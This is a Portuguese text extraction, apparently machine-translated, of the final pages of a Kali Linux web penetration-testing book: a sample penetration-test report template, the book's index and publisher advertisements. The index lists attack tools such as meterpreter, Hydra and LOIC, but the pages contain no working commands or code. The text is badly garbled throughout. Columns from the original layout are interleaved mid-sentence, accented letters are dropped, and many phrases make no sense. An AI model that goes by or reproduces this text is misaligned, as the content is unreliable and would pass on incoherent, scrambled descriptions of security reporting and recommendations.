quaisquer mudanas importantes para melhorar a segurana. [304] a sua Internet Penetration Test Relatrio Executivo Transferncia de conhecimento. de frente para a infra-estrutura tem 2.1 Segurana de Rede Durante as verificaes de segurana Captulo 8 outra avaliao de segurana externa. 2.1.1 ITEM 1 de nvel de rede, buscou-se investigar PRESTADOR DE SERVIOS AO Este um Descrio: as portas apresentar em CLIENTE recomenda desenvolver um precauo ao impacto de alteraes Durao Servio: SMTP, HTTP, vrios servidores e detectar servios plano de ao para o endereo feitas conforme recomendado a partir POP3, HTTPS em execuo com as falhas de problemas descobertos durante esta desta Servio Detalhes Verso: segurana existentes, se houver. avaliao. documento. Anlise No nvel do aplicativo web, fizemos o As recomendaes deste relatrio so Intrusion Detection / Prevention (IDS / Descrio check-configurao dos servidores classificados como ttico ou IPS): Redes expostas ao Nvel de Gravidade web 'e lgica estratgico. Ttico trfego potencialmente hostil deve Mdio erros no prprio aplicativo web. recomendaes so correes de implementar alguma capacidade de 2.1.2 ITEM 2 1.2 Escopo curto prazo para ajudar a elevar a detectar REPEAT O escopo deste Penetration Test foi segurana imediata intruses. Investigar uma soluo IDS Descrio sumria limitado aos seguintes endereos IP. preocupaes. Recomendaes para a rede. Referncias: http://www.weblink.com <endereo IP list> estratgicas concentrar no ambiente Automatizado de controle de acesso 2.2 vulnerabilidades em aplicaes <endereo IP list> global, o futuro de rede: A melhor prtica Web <endereo IP list> direes, e introduo de melhores automatizar o controle de Descrio dos riscos 1.3 Principais concluses prticas de segurana. Um dos quem eo que permitido o acesso Vulnerabilidade A Esta seo apresenta um resumo das destaques do rede especfica. Vulnerabilidade B questes crticas descobertos durante recomendaes segue: Vulnerabilidade C a 1.4.1 Recomendaes tticos Vulnerabilidade D Engajamento Teste de Invaso. 1.5 Resumo tabular Vulnerabilidade E 1.3.1 Vulnerabilidade A A tabela a seguir resume Avaliao da Vulnerabilidade F Explicao de vulnerabilidade Vulnerabilidade do Sistema: Ameaa encontrada. Categoria Nvel Recomendao para corrigir Resumo da avaliao de Grave vulnerabilidade. Recomendao 1 vulnerabilidade de Sistemas Grave 1.3.2 Vulnerabilidade B Recomendao 2 Nmero de Hosts ao vivo Grave Moderado Nvel RELATRIO DE TESTE DE que simulava um ator malicioso Moderado Baixo PENETRAO - Customer envolvido em um ataque direcionado Baixo Baixo ndice analtico contra a empresa Potencial Potencial Sumrio Executivo com os objetivos da seguinte forma: Perda Corporativo Perda Corporativo Resumo dos resultados Perda potencial Perda potencial Narrativa de Ataque Perda potencial Perda potencial Avaliao de Vulnerabilidade de rede Identificar se um atacante remoto Perda potencial Probabilidade de Avaliao Webserver Vulnerabilidade pode penetrar as defesas do CLIENTE Perda potencial Explorao Privilege Escalation Determinar o impacto de uma falha de Perda potencial Possibilidade de ser Mantendo o acesso a Alvos segurana em: Perda potencial comprometida comprometidos Probabilidade de Possibilidade de ser [307] Explorao comprometida Possibilidade de ser Recomendao Penetration Test Relatrio Executivo A integridade de segurana da comprometida Remediao Privilege Escalation Domnio empresa Possibilidade de ser Remediao Explorao contedo do banco de A confidencialidade das informaes comprometida A experincia tem mostrado que um dados da empresa Possibilidade de ser esforo concentrado para resolver os Atacante Controle de Operaes de A infra-estrutura interna e comprometida problemas descritos nesta Clientes disponibilidade dos clientes da Possibilidade de ser relatrio pode resultar em melhorias Concluso sistemas de informao comprometida de segurana dramticas. A maioria Recomendaes Os resultados desta avaliao sero Possibilidade de ser dos problemas identificados Classificao de Risco utilizados pelo Cliente para orientar as comprometida exigem o conhecimento e Apndice A: Vulnerabilidade Detalhe e decises futuras Possibilidade de ser compromisso com as boas prticas Mitigao quanto direo de seu programa de comprometida em vez de alto nvel Vulnerabilidade A segurana da informao. Todos os Recomendao skillsets tcnicos. Vulnerabilidade B testes e aes foram Remediao Apndice Vulnerabilidade C conduzida sob condies controladas. Remediao Esta seo fornece as imagens das Vulnerabilidade D Resumo dos resultados Remediao vulnerabilidades conhecidas Apndice B: Lista de alteraes feitas [308] Remediao apresentados no aos Sistemas Archmake Remediao observaes e descobertas mesa. Apndice C: Sobre Offensive Security Captulo 8 Remediao Relatrio de teste de penetrao Sumrio Executivo Reconnaissance Rede foi realizado [306] Cliente: PRESTADOR DE SERVIOS foi contra o espao de endereo Endereo contratada para realizar um teste de fornecido pelo Captulo 8 Informaes para contato penetrao contra CLIENTE com o entendimento de que Descrio dos riscos Provedor de servios: Presena na web externo do cliente. A esta gama de alvos seria considerado Vulnerabilidade G Endereo avaliao foi realizada de forma o escopo para este compromisso. Vulnerabilidade H Informaes para contato Determinou-se que a empresa Ameaa mantm presena externa mnima, consistindo No decorrer do teste de penetrao porque pode ser descoberto Impor controle de mudanas em todos em um site externo e outros servios externa, CLIENTE sofreu uma cascata remotamente atravs de varrimento os sistemas: As vulnerabilidades identificado pelo PRESTADOR DE srie de violaes que levaram a automatizado. O impacto de comuns so SERVIOS durante Reconnaissance condies que prejudicam diretamente explorar tais vulnerabilidades podem causado por erro humano. Muitos de CLIENTE. a empresa como paralisar rede do cliente e marca. problemas de configurao incorreta Ao rever a segurana do site principal bem como os seus clientes. Recomendaes poderia ser evitado cliente, descobriu-se Os objetivos especficos do teste de Louvamos ao cliente para ser pr- atravs de uma mudana forte e que um plugin vulnervel foi instalado. penetrao foram demonstrados como ativo na gesto de risco de tecnologia processo de controlo em todos os Este plugin foi explorada com segue: e sistemas activos. sucesso, segurana da rede por meio de Multifatorial Alavancagem e controle levando ao acesso administrativo. aquisio de nossos servios. Devido de acesso baseado em funo: Alguns Este acesso foi utilizada para obter Identificar se possvel a um atacante ao impacto da geral sistemas crticos acesso interativo remoto para penetrar ciberntico do organizao como descoberto por Foram encontrados alavancando a para o sistema operacional CLIENTE este teste de penetrao, os recursos segurana da senha como os nicos subjacente, e, em seguida, defesas adequados meios de validar encaminhado para privilgios de root. Determinar o impacto de uma falha de recomendado para ser alocado para pessoas autorizadas. A melhor prtica PRESTADOR DE SERVIOS foi segurana em: assegurar que os esforos de ter, pelo menos, duas formas de capaz de usar o acesso administrativo remediao so realizadas em autenticao, juntamente com a foi identificar interno tempo hbil. Enquanto uma lista limitao do acesso conta de recursos de rede. A vulnerabilidade abrangente de itens que devem ser administrao. em um sistema interno foi aproveitado A integridade dos sistemas da implementadas Restringir o acesso a sistemas para ganhar locais empresa. est para alm do mbito do presente crticos: Sistemas crticos devem ser acesso ao sistema, que foi ento A confidencialidade das informaes compromisso, alguns itens de alto isolados a partir de escalado para direitos de dos clientes da empresa. nvel so importantes para outros sistemas usando listas brancas, administrador de domnio. Isto colocou A infra-estrutura interna e citar: ACLs, VLANs, e outros meios. O toda a infra-estrutura da rede sob o disponibilidade das informaes do projeto controle dos atacantes. cliente Implementar um programa de conceito de privilgio mnimo vai Narrativa de Ataque sistemas. gerenciamento de patch: Muitas das limitar a quantidade de dano que um <Network Vulnerability Assessment [309] vulnerabilidades identificadas atacante pode Details> poderiam ser evitados com o provocado usando um recurso <webserver Vulnerability Assessment Penetration Test Relatrio Executivo gerenciamento de patches adequada. comprometida. Consulte NIST SP Details> Baseado servios fornecidos, foi Recomendamos seguinte 800-27 RevA11 para <Privilege Escalation Details> determinado que um invasor remoto as orientaes descritas no NIST SP orientaes sobre a obteno de uma <Maintaining Acesso ao Alvos seria capaz 800-408 como uma fonte para o linha de base de segurana para comprometidos Details> para penetrar as defesas do cliente. O desenvolvimento de sistemas de TI. <domain Escalation Privilege Details> vector invasor inicial identificado polticas de segurana para <Database Contedo Explorao como crtico, gerenciamento de patches adequada. Details> Isto ir reduzir o risco de Concluso execuo de sistemas vulnerveis. Classificao de Risco O risco global identificado pelo <Vulnerability A information> sobre citando para um projeto. Depois autenticao 175 provedor de servio para o cliente Resumo disso, quebrou os diferentes Autpsia 271-274 dividido Este captulo conclui este livro, componentes BIOS (Basic Input Output System) entre crtica e Baixo, definida da fornecendo orientaes para o de um documento entrega prestao senha 173 seguinte forma. PRESTADOR DE desenvolvimento profissional de melhores prticas para a prestao Teste de caixa preta 9 SERVIOS identificado prestao de servios ao cliente de resultados para o seu Navegador Explorao quadro. Ver trs vulnerabilidades crticas que relatrios de testes ps-penetrao. clientes. Ns adicionamos uma seo Carne foram usados para obter acesso aos Invadir final que cobria algumas ferramentas ataque de fora bruta clientes da interna sistemas e outras mos sobre o de relatrios disponveis em cerca de 107, 152 rede. trabalho tcnico divertido, no Kali Linux que poderia ajudar a gerar DirBuster 110-112 entanto, relatrios detalhados e informaes para suas entregas dos Hydra 107 prticas comerciais slidas pagar as clientes. WebSlayer 113-119 Crtico: Ameaa imediata para os contas. O que torna uma prtica de Realmente gostei de escrever este bulk_extractor 276 processos-chave de negcios servios profissionais livro e espero que o ajude com o seu BURP Proxy Alta: Ameaa indireta a chave sucesso a capacidade de se tornar aplicativo web cerca de 218-221 processos de negcio / ameaa de um conselheiro de confiana para o Objetivos do teste de penetrao. Arrotar Aranha 221 negcio secundrio seu campo relacionado. Para Obrigado pela leitura. Funo Aranha, utilizando 222-225 processos requisitos de segurana, isso significa [311] Arrotar Aranha 221 [310] ajudar os clientes a atender s normas C de conformidade, ndice Center for Internet Security (CIS) 254 Captulo 8 reduzir o risco de vulnerabilidades e Smbolos Autoridade de Certificao, OWASP- melhorar a forma de identificar Opo-t 55 Zap 90 ameaas. A certificaes de 299 Meio: Indireta ameaa / parcial aos O primeiro tema abordado foi o acccheck 209 Certified Ethical Hacker (CEH) 287 processos de negcio cumprimento, porque esse um relatrio de actividade 296 Certified Information Security Systems Baixa: No existe nenhuma ameaa mtodo comum para mostrar Guia Alertas, OWASP-Zap 92 Professional. Ver CISSP direta; vulnerabilidade pode ser valor para a aquisio de servios. Expectativa de perda anual (ALE) 15 Chkrootkit 271 alavanca com outro Encontramos os clientes a encontrar Taxa Anual de Ocorrncia (ARO) 15 chntpw 161-164 vulnerabilidades oramento, quando houver risco apndices 294 CIA 14 O nvel de risco atual de sistemas de no cumprir um mandato ou reagir Application Delivery Controller (ADC) Cisco Protection Network Foundation testados, com base no nvel de risco a um incidente recente, para saber aparelhos 264 (NFP) 254 mais elevado de resultados mais ataques na camada de aplicao 236 CISSP em sistemas crtico durante os padres populares ir melhorar a sua comando apt-get update 212 cerca de 15, 175 testes, um total de trs (3) Crtica, dois capacidade de importar para seus arpspoof 193, 194 Fatores de 175 (2) Mdio, clientes. Em seguida, ns Valor Patrimonial (AV) 15 Clickjacking e dois (2) foram identificados baixos olhou para os diferentes mtodos de ataque cerca de 177 vulnerabilidades. projeto de lei para os servios, bem cenrios, por scapy 238, 240 URL, ferramenta para download de Apndice: Vulnerabilidade Detalhe como algumas coisas a olhar para fora Guia de configurao Attack, 178 com Mitigao WebSlayer 114 B Carne credenciais 299 DirBuster Ferramentas de Explorao 30 cerca de 212 Proteco das Infra-(CIP) 280 cerca de 110-112 Guia Exploit, w3af 104 comando apt-get update 212 Cross-site scripting. Ver XSS Boto Relatrio 113 F hook.js 214 Crunch 15-170 Distributed Denial of Service. Ver DNS Falso 245 instalao de 212 CutyCapt 302 DDoS comando fdisk-l comeando 212 D DNS montagem 154 URL 212 DBPwAudit 210 alvo, identificao 55, 57 Federal Energy Regulatory Sistema Beef 41 dc3dd 269, 270 DNSCHEF 245, 246 Comisso (FERC) 280 Binwalk 274 DDoS. 235 Reconnaissance DNS Federal de Processamento de defesa tcnicas de 54, 55 Informaes Defesa Clickjacking 264 cerca de 251 Domain Name System (DNS) 245 Standards (FIPS) 279 clientes 73 Defesa Clickjacking 264 DoS. Federal de Segurana da Informao ataques do lado do cliente 129 defesa do bolinho 263, 264 cerca de 235 Lei de Gesto (FISMA) 280 do lado do cliente Penetrao Negao de Servio defesa 262 ataque, categorias 236 Ferret 192 Relatrio de teste 296 Man-in-the-middle defesa 259 Categorias de ataque de negao de Roteiro Fierce clonagem 132 Defesa tira SSL 262 servio comando, para a execuo de 56 ferramentas de clonagem 259 teste 252 ataques na camada de aplicao 236 Anlise do Sistema de Arquivos CmosPwd 173 Sistemas de Informao de Defesa ataques de protocolo 236 com Kali 267-269 Carto de Acesso Comum (CAC) 176 Agncia (DISA) 254 exausto sesso 236 Fimap Common Log Format (CLF) 208 defesas, testes de volume baseado ataques 236 cerca de 234 observncia cerca de 252 Dradis 300 utilizando 234 cerca de 278 segurana da linha de base 253 Emalhe 198 findmyhash 173 cumprimento da indstria 278, 279 senha, polticas 256 dsniff FireFox Plugins confidentility 283 gerenciamento de patches 254, 255 cerca de 193 cerca de 180 Biscoito Cadger Guia de Segurana Tcnico de comeando 195 arpspoof 193, 194 cerca de 184-186 Implementao [314] Biscoito Cadger 184-187 sesses reconhecidos 187 (STIG) 254 Biscoito Injector 182 sesso de informao pedido 187 Definio do alvo Espao 12 E Os cookies Gestor + 183 defesa do bolinho 263 Definio do sistema de destino (s) 11 Eletrnico coleta de dados, anlise, Emalhe 198 Biscoito Injector 182 Negao de Servio defesa 262 e Recuperao. (EDGAR) 40 dsniff 193-195 bolinhos Denial of Services. Ver DoS sistemas de e-mail Ettercap 196-198 cerca de 178 Departamento de Defesa (DOD) 254 explorando 105-107 Firesheep 180 ataques de seqestro de sesso, as ataque de dicionrio 152 Ettercap Greasemonkey 182 limitaes de 179 dictstat cerca de 196 Hamster 190-192 roubar 179 cerca de 171 opes de menu 197 man-in-the-middle ataque 193 Os cookies Gestor + 183 execuo 172 sumrio executivo 285, 286 Web Developer 180 folha de rosto 283 Dig (informaes de domnio groper) explorao Wireshark 187-190 guia rastreador, ProxyStrike 84 54 golos 19 Firesheep 180 creddump 174 forense digital 265, 266 ferramentas 19, 20 Bandeira definindo 12 quebra de senha, caminhos 152 Barrilha padres 279 FOCA [315] ferramentas de quebra de senhas 155 padres da indstria cerca de 66-72 Kali Linux cerca de 279, 280 URL, para download 67 Criceto 190-192 cerca de 17, 21 Fase Coleta de Informaes 282 Pegada de alvo Hardware Hacking 31 e VM imagem 29 Coleta de informaes 17, 30, 34 estabelecer 33 hashcat 159 DNSCHEF 245, 246 instalao Acima de tudo 275 Hash-identificador 170 explorao 19 Kali Linux 22-27 forense 31 hashing 152 instalao, material de 22 Kali Linux, requisitos 22 Forensics Bota 266, 267 Seguro de Sade Portabilidade e instalar 22-28 Organizao Internacional para ferramentas forenses Accountability Act (HIPAA) 253, 279 Inundator 248 Normalizao- cerca de 271 hexinject 209 Manter Foothold, metas 20 o (ISO) 253, 287 Autpsia 271-274 sediar reportar 296 Physical Address Extension (PAE) 21 Intrusion Detection / Prevention Binwalk 274 sediar a digitalizao escalao de privilgios 19, 20 (IDS / IPS) 305 bulk_extractor 276 cerca de 144 Reconnaissance 17 Inundator 248 Chkrootkit 271 com Nessus 145 elaborao de relatrios, ferramentas Iptables Acima de tudo 275 Aba Mquinas, NMap 64 300 utilizado, para a criao de porto Pasco 275 HTTrack em execuo, a partir de uma mdia redirecionamento 124-126 pdf-parser 275 cerca de 49, 257, 258 externa 21 [316] Scalpel 276 comando, exibindo 51, 52 Siege 247 FoxyProxy diretrio, selecionando 50 SniffJoke 246 eporting Ferramentas 31 cerca de 216 comeando 50 configurao do sistema 21 Engenharia reversa 30 proxy, adicionando 217 utilizando 49 alvo, avaliando 18 Cheirando e Spoofing 30 comando 53 fping hbrido 152 TCPReplay 248 Teste de Stress 31 G Hidra conjunto de ferramentas 29-31 Servios do Sistema 31 GHDB cerca de 107-110 URL, para download 21 Anlise de Vulnerabilidade 30 cerca de 45 J Kali Linux, ferramentas Aplicaes Web 30 acessando 46 Java Applet de Ataque 134 Ferramentas de Explorao 30 Os ataques sem fio 30 tela inicial 48 ofertas de empregos 41 forense 31 KeepNote 301 consulta de pesquisa, a seleo de 47 Johnny Hardware Hacking 31 N URL 46 cerca de 156 Coleta de informaes 30 Instituto Nacional de Padres e GIAC Penetrao Tester (GPEN) 287 Guia Sada 158 Ferramenta de acesso Manter 30 Tecnologia- glossrio 294 Guia Estatsticas 158 Ataques senha 30 logia (NIST) 280 Google Hacking 44, 45 utilizando 156 Eu Opo NAT 135 Banco de Dados do Google Hacking. John the Ripper ICMP Reconnaissance Nessus Ver GHDB cerca de 119 tcnicas de 52, 53 cdigo de ativao, URL 145 Teste de caixa cinza 10 abertura 120 comando ifconfig 122 transferncia, para o Debian 145 Greasemonkey 182 operao 120 cumprimento da indstria sediar a digitalizao 145 H utilizando, em arquivo de senhas 121 linhas de base 279 instalao, em Kali 145, 146 hackers K diretrizes 279 usando 146-150 Nessus HomeFeed 145 Ferramentas de acesso Manter 20, 30 ferramentas 20 phrasendrescher 173 ProfessionalFeed Nessus 145 Maltego ferramentas de quebra de senha, Kali Physical Address Extension (PAE) 21 Netcat 106, 107 cerca de 57 cerca de 155 comando ping 52 Network Mapper. Ver NMap comeando 57 chntpw 161-164 Guia Ping, NMap 63 servidores de rede 73 utilizando 58 Crunch 168, 169 plugins guia, ProxyStrike 84 guia topologia da rede, NMap 63 Maltego caseFile 301 hashcat 159 Opo de encaminhamento porta 135 Intrusion Prevention Next Generation man-in-the-middle Johnny 156, 158 redirecionamento de porta Sistemas (NGIPS) 216 cerca de 121 oclHashcat 159 configurando, Iptables usado 124-126 NMap defesa 259, 260 Ophcrack 165, 166, 167 escalao de privilgios cerca de 59, 62 man-in-the-middle ataque 193 samdump2 161 cerca de 19 Hosts tab 64 Mdia de Segurana Controle de senhas golos 20 guia de topologia de rede 63 Acesso cerca de 119 servios profissionais 280, 281 novo perfil, criando 61 (MACsec) 261 rachaduras 151 Reviso do Projeto 282 Novo perfil ou de comando, Metasploit rachaduras, por hackers 152 ataques de protocolo 236 selecionando 61 cerca de 96-102 Linux senhas 155 seo proxy, Vega 88 Guia Ping 63 URL 98 polticas 256, 257 ProxyStrike Boto Salvar alteraes 63 meterpreter 132 Senhas do Windows 153 cerca de 81, 82 janela de digitalizao 65 MITM. Ver man-in-the-middle Patator 210 guia rastreador 84 URL 59 MITM Proxy 143, 144 gerenciamento de patches 254, 255 guia 84 log utilizando 59 MLA 277 consertar este sistema 292 plugins tab 84 Zenmap 65, 66 O Guia Generator Payload, WebSlayer URL 84 Zenmap, a abertura 60 Ophcrack 165-167 114 utilizando 82 North American Electric Reliability OTP (one-time passwords) 261 Stand-aplicativo de pagamento guia proxy, Vega 86 Corporation (NERC) 280 OWASP-Zap Segurana de Dados R L cerca de 89 ard (PA-DSS) 280 RainbowCrack 152 Linux senhas 155 Alertas tab 92 Payment Card Industry Data Security RainbowCrack (rcracki_mt) 172 guia log, ProxyStrike 84 Certificate Authority 90 Padro (PCI DSS) 253, 280 tabelas do arco-ris 152 Janela Log, w3af 104 Gerar 90 pdf-parser 275 Atacantes reais 11 LOIC 89 boto Gerar Penetrao Teste Relatrio Executivo Reconhecimento cerca de 242 Relatrio HTML 94 277, 278 cerca de 17, 18, 33 instalao de 243 mercado 94 Teste de Invaso site da empresa 35 o lanamento de 244 [317] cerca de 7, 8, 16 Reconnaissance DNS, tcnicas de 53, utilizando 244 Teste de caixa preta 9 55 Low Orbit Ion Cannon. Ver LOIC Guia Relatrio 94 Teste de caixa cinza 10 Identificao do alvo DNS 55, 57 M Sites janela 91 aplicao web 8, 9 Eletrnico coleta de dados, anlise e MagicTree 301 P Teste de caixa branca 9, 10 Retrieval (EDGAR) 40 Manter Foothold Pasco 275 trabalho, alcance 11 FOCA 66-72 cerca de 20 Ataques senha A verificao de identidade pessoal Google Hacking 44, 45 golos 20 cerca de 30 (PIV) 176 Google Hacking banco de dados procedimentos de teste, detalhado Sensvel Informaes Compartmented engenharia social 129, 130 (GHDB) 45-48 288 Facility (SCIF) 283 Ataques de engenharia social 134 HTTrack 49-52 cronograma 284 servidor 73 Sociais Toolkit Engenharia. Ver SET ICMP Reconnaissance, tcnicas de vulnerabilidades 290, 292 ataques do lado do servidor 74 mdias sociais 52, 53 Reporting Tools 31 servios comandar 98 cerca de 41 trabalho, postagens 41 ferramentas de relatrios, Kali Linux exausto sesso 236 SOW localizao 42 CutyCapt 302 gerenciamento de sesses cerca de 284, 295 Maltego 57, 58 Dradis 300 cerca de 177 relatrio de actividade 296 redes, pesquisando 48, 49 KeepNote 301 SET do lado do cliente Penetrao Nmap 59-62 MagicTree 301 cerca de 130, 131, 230, 231 Relatrio de teste 296 objetivos 34 Maltego caseFile 301 falso e-mail, o envio de 141, 142 relatrio executivo 295 Registros Regionais da Internet (RIRs) amostra relata 302-310 meterpreter 139 relatrio executivo, exemplo 295 39 Guia Relatrio, OWASP-Zap 94 a criao de 131, 132 sediar reportar 296 pesquisa 34 Os pedidos de Preos (RFP) Cloner site 140 o material 298, 299 Shodan 42 cerca de 281 modelo, a seleo de 232 testes de penetrao, externo 296, [318] Guia Resultados, w3af 104 nome de utilizador, inserindo 233 297 Engenharia reversa 30 utilizando, para atacar 132-134 relatrio de um utilizador 296 mdia social, recursos 41 Fase de reviso 282 utilizando, para clonar 132-134 relatrio vulnerabilidade 296 confiana 41 RIRs 39 Definir senha colheita. Ver SET SQL histrico da web, fontes de 36-38 Arquivo robots.txt 35 Shodan 42 cerca de 200, 201 Registros Regionais de Internet. Ver S Sidejacking 190 injeo de 202, 203 RIRs salga 152 Siege 247 SqlMap 203, 204 relatrio samdump2 161 Expectativa de perda nica. Ver SLE SqlMap 203, 204 documentao 282 SAM (Account Management System) Cloner site 140 Tira SSL 122, 123 relatrio executivo 285, 286 regis- Janela Sites, OWASP-Zap 91 Defesa tira SSL 261, 262 formato 282 tentar arquivo 153 Skipfish Declarao de Trabalho. Ver SOW Boto Report, DirBuster 113 Lei Sarbanes-Oxley (SOX) 280 cerca de 78, 80 STIG 254 relatrio, o formato Boto Salvar alteraes 63 opes de comando 78 Teste de Stress 31 apndices 294 Sistema SCADA 42 verso mais recente, o download de Resumo dos resultados 289 declarao de confidencialidade 283 Scalpel 276 78 Servios do Sistema 31 folha de rosto 283 guia scanner, Vega 86 SLE 15 dictstat 171, 172 documento, controle de 284 Scapy SlowLoris findmyhash 173 sumrio executivo 285, 286 cerca de 238 cerca de 241 Hash-identificador 170 resultados, resumo 289 ataque, cenrios 238-240 execuo 241 phrasendrescher 173 glossrio 294 Secure Socket Layer (SSL) 236 URL para download de 241 RainbowCrack (rcracki_mt) 172 metodologia 286, 287 auditoria de segurana 13 Cheirando e Spoofing 30 comando traceroute 52 rede, consideraes 292, 293 Guia de Segurana Tcnico de SniffJoke 246 TrustedSec. 130 rede, recomendaes 292, 293 Implementao. [319] Servios Turnkey 280 Ver STIG U Unicast Inverter caminho Forwarding A Associao de Lnguas Modernas Windows Nossos livros e publicaes (Unicast da montagem 154 compartilhar as experincias de seus RPF) 263 Estilo Amrica. Ver MLA O Windows Reverse_TCP Meterpreter colegas profissionais de TI na Atualize a opo Toolkit social- Time and Materials 281 136 adaptao Engenheiro Prazo do trabalho realizado 11 Ataques sem fio 30 e personalizao de sistemas de hoje, 134 cronogramas 284 Wireshark aplicaes e frameworks. Nossa urlsnarf ferramentas, Kali cerca de 187 soluo livros baseados cerca de 208 CmosPwd 173 localizao 188 dar-lhe o conhecimento e poder de acessando 208 creddump 174 trfego, capturando 188, 189 personalizar o software e tecnologias utilizando 208 W bolinho inseguro, capturando 190 que voc est usando relatrio de um utilizador 296 w3af Wireshark Biscoito Dump 182 para comear o trabalho feito. Packt V cerca de 102-105 comando contagem de palavras 120 livros so mais especficos e menos Vega Guia 104 Exploit X geral do que os livros de TI que voc cerca de 85, 86 Entrar janela 104 XSS tem Mdulos de injeo 86 Guia Resultados 104 cerca de 204 visto no passado. Nosso modelo de Seo Proxy 88 w3mir 259 cookie de roubar 206, 207 negcios nico que nos permite guia Proxy 86 [320] teste 205, 206 trazer-lhe informaes mais focado, Mdulos de processamento de Z dando-lhe mais do que voc precisa resposta 86 Wayback Machine ZAP saber, e menos do que voc no faz. guia do scanner 86 acessando 36 cerca de 225, 226 Packt uma editora ainda originais Site View janela 87 aplicao web 8, 9, 30 Arquivos SEED 228, 229 modernas, que se concentra na Virtual Private Network (VPN) 261 Aplicaes Web Attack e Auditoria criao, com o Firefox 226, 227 produo de qualidade, Imagem VM Quadro. Ver w3af Zaproxy. Ver OWASP-Zap livros de ponta para as comunidades e Kali Linux 29 WebCopier 259 Zenmap 65 de desenvolvedores, administradores de volume baseado ataques 236 Web Developer 180 abertura 60 e tambm de novatos. Para vulnerabilidades 290, 292 Cookies de sesso web. Ver bolinhos [321] obter mais informaes, visite o nosso Anlise de Vulnerabilidade 18, 30 Webshag website: www.packtpub.com. Avaliao de Vulnerabilidade 13 16 cerca de 74-77 Teste de Invaso Web com Kali Linux Obrigado por comprar relatrio vulnerabilidade 296 URL 77 Sobre Packt Publishing Sobre Packt Open Source T webshag-gui 74 Packt, pronuncia-se 'embalado', Em 2010, Packt lanou duas novas Tamper Data 108-110 Vetores de Ataque Site 134 publicou o seu primeiro livro marcas, Packt Open Source e Packt Alvo de Avaliao 18 WebSlayer "Mastering phpMyAdmin para da empresa, a fim de TCPReplay 248 cerca de 113-118 Aumentar a Eficcia continuar seu foco na especializao. prova Guia Configurao de Ataque 114 Gesto MySQL " em abril de 2004 e, Este livro faz parte da marca Packt procedimentos 288 Guia Generator Payload 114 posteriormente, continuou a Open Source, casa THC 107 Websploit especializar-se em publicao de livros publicados sobre software THC-SSL-DOS 236, 237 cerca de 95 livros altamente focada em construdo em torno de licenas de Escolha do Hacker. Ver THC acessando 95 tecnologias e solues especficas. cdigo aberto, e que oferecem Teste de caixa branca 9, 10 informaes a qualquer um dos desenvolvedores Proteja a sua rede wireless contra Por favor, verifique Mais de 80 receitas / practicaltasks avanados para iniciantes de web ataques, cortes, www.PacktPub.com para obter que vai designers. A marca Open Source e intrusos com este guia passo-a- informaes sobre nossos ttulos aumentar o conhecimento do leitor a tambm corre Open Source Royalty passo [324] partir de iniciante Esquema de Packt, pelo qual Packt d 1. a um nvel avanado um royalty para cada Abrir 2. BackTrack 5 Penetrao sem fio Foco especial sobre os mais recentes Projeto Fonte sobre cujo software um 3. Guia do Testing Beginner sistemas operacionais, livro vendido. Faa suas redes sem fio prova de ISBN: 978-1-84951-558-0 exploits, e tcnicas de teste de Escrevendo para Packt balas Paperback: 220 pginas penetrao Congratulamo-nos com todas as Facilmente proteger a sua rede de Mestre borda do sangramento A anlise detalhada de ferramentas de perguntas de pessoas que esto intrusos tcnicas de teste com witeless terceiros com base interessadas em criao. Propostas Veja como os hackers faz-lo e BackTrack 5 na estrutura Metasploit para melhorar Livro aprender a 1. o devem ser enviadas para defender-se 2. experincia em testes de penetrao author@packtpub.com. Se a sua idia BackTrack 5 Cookbook 3. 2. do livro ainda est numa fase inicial e ISBN: 978-1-84951-738-6 4. 3. voc Paperback: 296 pginas Saiba Teste de Invaso sem fio com o Por favor, verifique gostaria de discuti-lo primeiro antes de Mais de 80 receitas para executar verso mais recente do Backtrack www.PacktPub.com para obter escrever uma proposta formal do livro, muitas das mais conhecidas O primeiro e nico livro que aborda informaes sobre nossos ttulos entre em contato conosco; um dos e pequenos aspectos peneration de sem fio [325] nossos testes conhecidos de testes com BackTrack editores de comissionamento ir BackTrack 5 Conceitos explicados com o passo-a- Obrigado entrar em contato com voc. 1. passo prtico Quer mais Ns no estamos apenas procura de 2. sesses e ilustraes ricas Livros? autores publicados, se voc tem fortes Aprenda a realizar testes de Escrito por Vivek Ramachandran - Ns esperamos que voc aprendeu habilidades tcnicas, mas nenhuma penetrao com mundo o que voc esperava de aprender escrita BackTrack 5 pesquisa de segurana de renome e com experincia, os nossos editores Cerca de 100 receitas projetadas para evangelista, e este e-book. Encontrar tais livros experientes podem ajud-lo a ensinar descobridor do wireless "Caffe Latte mais teis sobre desenvolver uma carreira de escritor, princpios de teste de penetrao e de Attack" www.PlentyofeBooks.net ou simplesmente obter alguma construo Metasploit Teste de Invaso recompensa adicional para a sua conhecimento do BackTrack 5 Livro de receitas Saiba mais e fazer seus pais especializao. Ferramentas ISBN: 978-1-84951-742-3 orgulhosos :) Fornece instrues passo-a-passo Mais de 70 receitas para dominar o BackTrack - Teste sem fio sobre mais utilizado Saudaes Segurana de Rede o uso de muitos dos BackTrack do framework de testes de penetrao www.PlentyofeBooks.net ISBN: 978-1-78216-406-7 popular e 1. Paperback: 108 pginas ferramentas no to populares Paperback: 268 pginas 3.